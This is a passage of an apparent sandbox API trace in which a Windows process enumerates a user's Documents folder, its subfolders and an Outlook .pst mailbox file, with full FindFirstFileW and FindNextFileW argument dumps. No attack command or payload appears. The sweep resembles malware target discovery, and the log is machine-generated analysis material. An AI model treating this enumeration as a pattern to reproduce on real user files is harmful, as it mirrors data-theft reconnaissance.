ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x813171f0, ftCreationTime.dwHighDateTime=0x1d7f5c6, ftLastAccessTime.dwLowDateTime=0x2d799110, ftLastAccessTime.dwHighDateTime=0x1d7f7d7, ftLastWriteTime.dwLowDateTime=0x2d799110, ftLastWriteTime.dwHighDateTime=0x1d7f7d7, nFileSizeHigh=0x0, nFileSizeLow=0x435e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ncy0WD.pptx", cAlternateFileName="NCY0WD~1.PPT")) returned 1 [0256.706] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316d2d20, ftCreationTime.dwHighDateTime=0x1d81bec, ftLastAccessTime.dwLowDateTime=0x4ae7d220, ftLastAccessTime.dwHighDateTime=0x1d81fc3, ftLastWriteTime.dwLowDateTime=0x4ae7d220, ftLastWriteTime.dwHighDateTime=0x1d81fc3, nFileSizeHigh=0x0, nFileSizeLow=0x7bd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYpw8g8C3.docx", cAlternateFileName="NYPW8G~1.DOC")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x65ef9a5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa2a2b50, ftCreationTime.dwHighDateTime=0x1d7acd9, ftLastAccessTime.dwLowDateTime=0xccfd4650, ftLastAccessTime.dwHighDateTime=0x1d7f3e5, ftLastWriteTime.dwLowDateTime=0xccfd4650, ftLastWriteTime.dwHighDateTime=0x1d7f3e5, nFileSizeHigh=0x0, nFileSizeLow=0x1128e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PksQcVAF-FVG.docx", cAlternateFileName="PKSQCV~1.DOC")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c3a800, ftCreationTime.dwHighDateTime=0x1d80113, ftLastAccessTime.dwLowDateTime=0xd9f19990, ftLastAccessTime.dwHighDateTime=0x1d801d9, ftLastWriteTime.dwLowDateTime=0xd9f19990, ftLastWriteTime.dwHighDateTime=0x1d801d9, nFileSizeHigh=0x0, nFileSizeLow=0xc404, dwReserved0=0x0, dwReserved1=0x0, cFileName="r1qXEfMA4-j F9no2.pptx", cAlternateFileName="R1QXEF~1.PPT")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0f1bf0, ftCreationTime.dwHighDateTime=0x1d7b386, ftLastAccessTime.dwLowDateTime=0x8f3517b0, ftLastAccessTime.dwHighDateTime=0x1d7df2e, ftLastWriteTime.dwLowDateTime=0x8f3517b0, ftLastWriteTime.dwHighDateTime=0x1d7df2e, nFileSizeHigh=0x0, nFileSizeLow=0xa68a, dwReserved0=0x0, dwReserved1=0x0, cFileName="rABuPsLDVO2opjc 4TTO.pptx", cAlternateFileName="RABUPS~1.PPT")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaecf10, ftCreationTime.dwHighDateTime=0x1d7dbdb, ftLastAccessTime.dwLowDateTime=0x8ece31f0, ftLastAccessTime.dwHighDateTime=0x1d810e6, ftLastWriteTime.dwLowDateTime=0x8ece31f0, ftLastWriteTime.dwHighDateTime=0x1d810e6, nFileSizeHigh=0x0, nFileSizeLow=0x170bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="scXDc.xlsx", cAlternateFileName="SCXDC~1.XLS")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b6d590, ftCreationTime.dwHighDateTime=0x1d80256, ftLastAccessTime.dwLowDateTime=0x87c1d480, ftLastAccessTime.dwHighDateTime=0x1d81cf2, ftLastWriteTime.dwLowDateTime=0x87c1d480, ftLastWriteTime.dwHighDateTime=0x1d81cf2, nFileSizeHigh=0x0, nFileSizeLow=0x6f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="shxQYJ mAX35K2VsG.xlsx", cAlternateFileName="SHXQYJ~1.XLS")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf35acf0, ftCreationTime.dwHighDateTime=0x1d81a61, ftLastAccessTime.dwLowDateTime=0xe025a8e0, ftLastAccessTime.dwHighDateTime=0x1d824b3, ftLastWriteTime.dwLowDateTime=0xe025a8e0, ftLastWriteTime.dwHighDateTime=0x1d824b3, nFileSizeHigh=0x0, nFileSizeLow=0x17361, dwReserved0=0x0, dwReserved1=0x0, cFileName="tONZR0L5XBEql C.odt", cAlternateFileName="TONZR0~1.ODT")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3df7d790, ftCreationTime.dwHighDateTime=0x1d822d9, ftLastAccessTime.dwLowDateTime=0x67798e80, ftLastAccessTime.dwHighDateTime=0x1d827f5, ftLastWriteTime.dwLowDateTime=0x67798e80, ftLastWriteTime.dwHighDateTime=0x1d827f5, nFileSizeHigh=0x0, nFileSizeLow=0x62f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TP7qaB_8RwFo0zi2S F.ods", cAlternateFileName="TP7QAB~1.ODS")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24d3f1a0, ftCreationTime.dwHighDateTime=0x1d80d89, ftLastAccessTime.dwLowDateTime=0xabad3d50, ftLastAccessTime.dwHighDateTime=0x1d80e8b, ftLastWriteTime.dwLowDateTime=0xabad3d50, ftLastWriteTime.dwHighDateTime=0x1d80e8b, nFileSizeHigh=0x0, nFileSizeLow=0x11072, dwReserved0=0x0, dwReserved1=0x0, cFileName="UYS dfMqbVg.xlsx", cAlternateFileName="UYSDFM~1.XLS")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a88e610, ftCreationTime.dwHighDateTime=0x1d8247a, ftLastAccessTime.dwLowDateTime=0xccb90600, ftLastAccessTime.dwHighDateTime=0x1d824e8, ftLastWriteTime.dwLowDateTime=0xccb90600, ftLastWriteTime.dwHighDateTime=0x1d824e8, nFileSizeHigh=0x0, nFileSizeLow=0x17ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="VupTUE7Pb.xls", cAlternateFileName="VUPTUE~1.XLS")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe437aef0, ftCreationTime.dwHighDateTime=0x1d821a3, ftLastAccessTime.dwLowDateTime=0x267a69c0, ftLastAccessTime.dwHighDateTime=0x1d82342, ftLastWriteTime.dwLowDateTime=0x267a69c0, ftLastWriteTime.dwHighDateTime=0x1d82342, nFileSizeHigh=0x0, nFileSizeLow=0x2383, dwReserved0=0x0, dwReserved1=0x0, cFileName="XxX9zS.ods", cAlternateFileName="")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ffb7550, ftCreationTime.dwHighDateTime=0x1d7c86e, ftLastAccessTime.dwLowDateTime=0x49d17580, ftLastAccessTime.dwHighDateTime=0x1d822f7, ftLastWriteTime.dwLowDateTime=0x49d17580, ftLastWriteTime.dwHighDateTime=0x1d822f7, nFileSizeHigh=0x0, nFileSizeLow=0x7cae, dwReserved0=0x0, dwReserved1=0x0, cFileName="zN zufeMLK.xlsx", cAlternateFileName="ZNZUFE~1.XLS")) returned 1 [0256.707] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.707] FindClose (in: hFindFile=0x8fef00 | out: hFindFile=0x8fef00) returned 1 [0256.708] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.709] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb80 [0256.709] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63954f0d, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x65ef9a5c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878c65f2, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.709] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6397affd, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6397affd, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x878917cb, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="achoo@gdllo.de.pst", cAlternateFileName="ACHOO@~1.PST")) returned 1 [0256.709] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.709] FindClose (in: hFindFile=0x8feb80 | out: hFindFile=0x8feb80) returned 1 [0256.710] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.710] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb313a840, ftCreationTime.dwHighDateTime=0x1d81cc3, ftLastAccessTime.dwLowDateTime=0x793b780, ftLastAccessTime.dwHighDateTime=0x1d824ed, ftLastWriteTime.dwLowDateTime=0x793b780, ftLastWriteTime.dwHighDateTime=0x1d824ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb80 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb313a840, ftCreationTime.dwHighDateTime=0x1d81cc3, ftLastAccessTime.dwLowDateTime=0x793b780, ftLastAccessTime.dwHighDateTime=0x1d824ed, ftLastWriteTime.dwLowDateTime=0x793b780, ftLastWriteTime.dwHighDateTime=0x1d824ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d2460, ftCreationTime.dwHighDateTime=0x1d81dd7, ftLastAccessTime.dwLowDateTime=0xb473d8c0, ftLastAccessTime.dwHighDateTime=0x1d825bc, ftLastWriteTime.dwLowDateTime=0xb473d8c0, ftLastWriteTime.dwHighDateTime=0x1d825bc, nFileSizeHigh=0x0, nFileSizeLow=0x25c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="00jJreyg.doc", cAlternateFileName="")) returned 1 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9e670, ftCreationTime.dwHighDateTime=0x1d81e5e, ftLastAccessTime.dwLowDateTime=0xd7a531f0, ftLastAccessTime.dwHighDateTime=0x1d82980, ftLastWriteTime.dwLowDateTime=0xd7a531f0, ftLastWriteTime.dwHighDateTime=0x1d82980, nFileSizeHigh=0x0, nFileSizeLow=0xd372, dwReserved0=0x0, dwReserved1=0x0, cFileName="8NTFMxPNLnS-.xlsx", cAlternateFileName="8NTFMX~1.XLS")) returned 1 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a50a80, ftCreationTime.dwHighDateTime=0x1d8220d, ftLastAccessTime.dwLowDateTime=0x48eeaf70, ftLastAccessTime.dwHighDateTime=0x1d8231f, ftLastWriteTime.dwLowDateTime=0x48eeaf70, ftLastWriteTime.dwHighDateTime=0x1d8231f, nFileSizeHigh=0x0, nFileSizeLow=0xed44, dwReserved0=0x0, dwReserved1=0x0, cFileName="aSlWuoctTT0Qhm.odp", cAlternateFileName="ASLWUO~1.ODP")) returned 1 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed0834a0, ftCreationTime.dwHighDateTime=0x1d8209a, ftLastAccessTime.dwLowDateTime=0x63cfe220, ftLastAccessTime.dwHighDateTime=0x1d8298f, ftLastWriteTime.dwLowDateTime=0x63cfe220, ftLastWriteTime.dwHighDateTime=0x1d8298f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AZLma79E0y7Lx7ST0eS", cAlternateFileName="AZLMA7~1")) returned 1 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4680290, ftCreationTime.dwHighDateTime=0x1d81fd5, ftLastAccessTime.dwLowDateTime=0x77db11a0, ftLastAccessTime.dwHighDateTime=0x1d825ba, ftLastWriteTime.dwLowDateTime=0x77db11a0, ftLastWriteTime.dwHighDateTime=0x1d825ba, nFileSizeHigh=0x0, nFileSizeLow=0x10734, dwReserved0=0x0, dwReserved1=0x0, cFileName="EzBvLweM.doc", cAlternateFileName="")) returned 1 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa43c130, ftCreationTime.dwHighDateTime=0x1d81a09, ftLastAccessTime.dwLowDateTime=0xd9c24c0, ftLastAccessTime.dwHighDateTime=0x1d81e0b, ftLastWriteTime.dwLowDateTime=0xd9c24c0, ftLastWriteTime.dwHighDateTime=0x1d81e0b, nFileSizeHigh=0x0, nFileSizeLow=0x18daa, dwReserved0=0x0, dwReserved1=0x0, cFileName="f4-p4sl_a3HK_SD.pptx", cAlternateFileName="F4-P4S~1.PPT")) returned 1 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdff0b560, ftCreationTime.dwHighDateTime=0x1d82001, ftLastAccessTime.dwLowDateTime=0xe02b48a0, ftLastAccessTime.dwHighDateTime=0x1d8247b, ftLastWriteTime.dwLowDateTime=0xe02b48a0, ftLastWriteTime.dwHighDateTime=0x1d8247b, nFileSizeHigh=0x0, nFileSizeLow=0x165ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="LbcN3M.odt", cAlternateFileName="")) returned 1 [0256.711] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cce0ae0, ftCreationTime.dwHighDateTime=0x1d820c0, ftLastAccessTime.dwLowDateTime=0xe09e21e0, ftLastAccessTime.dwHighDateTime=0x1d822be, ftLastWriteTime.dwLowDateTime=0xe09e21e0, ftLastWriteTime.dwHighDateTime=0x1d822be, nFileSizeHigh=0x0, nFileSizeLow=0x7b31, dwReserved0=0x0, dwReserved1=0x0, cFileName="ohmbGEEdwmqzwO.xlsx", cAlternateFileName="OHMBGE~1.XLS")) returned 1 [0256.712] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70481db0, ftCreationTime.dwHighDateTime=0x1d82070, ftLastAccessTime.dwLowDateTime=0xc3c87fa0, ftLastAccessTime.dwHighDateTime=0x1d8277a, ftLastWriteTime.dwLowDateTime=0xc3c87fa0, ftLastWriteTime.dwHighDateTime=0x1d8277a, nFileSizeHigh=0x0, nFileSizeLow=0x17aae, dwReserved0=0x0, dwReserved1=0x0, cFileName="THfi.ppt", cAlternateFileName="")) returned 1 [0256.712] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc14c370, ftCreationTime.dwHighDateTime=0x1d827b9, ftLastAccessTime.dwLowDateTime=0x72e646d0, ftLastAccessTime.dwHighDateTime=0x1d829f5, ftLastWriteTime.dwLowDateTime=0x72e646d0, ftLastWriteTime.dwHighDateTime=0x1d829f5, nFileSizeHigh=0x0, nFileSizeLow=0x7657, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y75tBvZHinL.pptx", cAlternateFileName="Y75TBV~1.PPT")) returned 1 [0256.712] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.712] FindClose (in: hFindFile=0x8feb80 | out: hFindFile=0x8feb80) returned 1 [0256.712] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.712] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\*", lpFindFileData=0x123a34e0 | out: lpFindFileData=0x123a34e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed0834a0, ftCreationTime.dwHighDateTime=0x1d8209a, ftLastAccessTime.dwLowDateTime=0x63cfe220, ftLastAccessTime.dwHighDateTime=0x1d8298f, ftLastWriteTime.dwLowDateTime=0x63cfe220, ftLastWriteTime.dwHighDateTime=0x1d8298f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb00 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed0834a0, ftCreationTime.dwHighDateTime=0x1d8209a, ftLastAccessTime.dwLowDateTime=0x63cfe220, ftLastAccessTime.dwHighDateTime=0x1d8298f, ftLastWriteTime.dwLowDateTime=0x63cfe220, ftLastWriteTime.dwHighDateTime=0x1d8298f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5571780, ftCreationTime.dwHighDateTime=0x1d826f4, ftLastAccessTime.dwLowDateTime=0x676d6270, ftLastAccessTime.dwHighDateTime=0x1d82856, ftLastWriteTime.dwLowDateTime=0x676d6270, ftLastWriteTime.dwHighDateTime=0x1d82856, nFileSizeHigh=0x0, nFileSizeLow=0x1bc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="0ToZccO18urTblN.rtf", cAlternateFileName="0TOZCC~1.RTF")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa090f120, ftCreationTime.dwHighDateTime=0x1d81b40, ftLastAccessTime.dwLowDateTime=0xe96677f0, ftLastAccessTime.dwHighDateTime=0x1d81cd8, ftLastWriteTime.dwLowDateTime=0xe96677f0, ftLastWriteTime.dwHighDateTime=0x1d81cd8, nFileSizeHigh=0x0, nFileSizeLow=0x110e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="4bt-B2q.pdf", cAlternateFileName="")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34ebde0, ftCreationTime.dwHighDateTime=0x1d81e3b, ftLastAccessTime.dwLowDateTime=0xdd91570, ftLastAccessTime.dwHighDateTime=0x1d82076, ftLastWriteTime.dwLowDateTime=0xdd91570, ftLastWriteTime.dwHighDateTime=0x1d82076, nFileSizeHigh=0x0, nFileSizeLow=0x1869d, dwReserved0=0x0, dwReserved1=0x0, cFileName="6wvQVTWOr1.doc", cAlternateFileName="6WVQVT~1.DOC")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f5b1c40, ftCreationTime.dwHighDateTime=0x1d81d7c, ftLastAccessTime.dwLowDateTime=0xebc22e10, ftLastAccessTime.dwHighDateTime=0x1d82271, ftLastWriteTime.dwLowDateTime=0xebc22e10, ftLastWriteTime.dwHighDateTime=0x1d82271, nFileSizeHigh=0x0, nFileSizeLow=0x4d0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="7NGgJCF9p1sXP7bTM6Xc.odp", cAlternateFileName="7NGGJC~1.ODP")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cebb470, ftCreationTime.dwHighDateTime=0x1d82790, ftLastAccessTime.dwLowDateTime=0x24a3a000, ftLastAccessTime.dwHighDateTime=0x1d827fa, ftLastWriteTime.dwLowDateTime=0x24a3a000, ftLastWriteTime.dwHighDateTime=0x1d827fa, nFileSizeHigh=0x0, nFileSizeLow=0x14721, dwReserved0=0x0, dwReserved1=0x0, cFileName="8BJrk8.pps", cAlternateFileName="")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5fbd10, ftCreationTime.dwHighDateTime=0x1d81e1f, ftLastAccessTime.dwLowDateTime=0xbde2d900, ftLastAccessTime.dwHighDateTime=0x1d8250e, ftLastWriteTime.dwLowDateTime=0xbde2d900, ftLastWriteTime.dwHighDateTime=0x1d8250e, nFileSizeHigh=0x0, nFileSizeLow=0x2eb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="aLqbOAns.odp", cAlternateFileName="")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98523c00, ftCreationTime.dwHighDateTime=0x1d81cc9, ftLastAccessTime.dwLowDateTime=0xf401cfd0, ftLastAccessTime.dwHighDateTime=0x1d81dc2, ftLastWriteTime.dwLowDateTime=0xf401cfd0, ftLastWriteTime.dwHighDateTime=0x1d81dc2, nFileSizeHigh=0x0, nFileSizeLow=0xf1a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CJfBVMezWzfCMgvFYwf.ots", cAlternateFileName="CJFBVM~1.OTS")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccad2a80, ftCreationTime.dwHighDateTime=0x1d8299b, ftLastAccessTime.dwLowDateTime=0x3b416ec0, ftLastAccessTime.dwHighDateTime=0x1d829ab, ftLastWriteTime.dwLowDateTime=0x3b416ec0, ftLastWriteTime.dwHighDateTime=0x1d829ab, nFileSizeHigh=0x0, nFileSizeLow=0xe790, dwReserved0=0x0, dwReserved1=0x0, cFileName="eJiGd4u4uD5.pps", cAlternateFileName="EJIGD4~1.PPS")) returned 1 [0256.713] FindNextFileW (in: 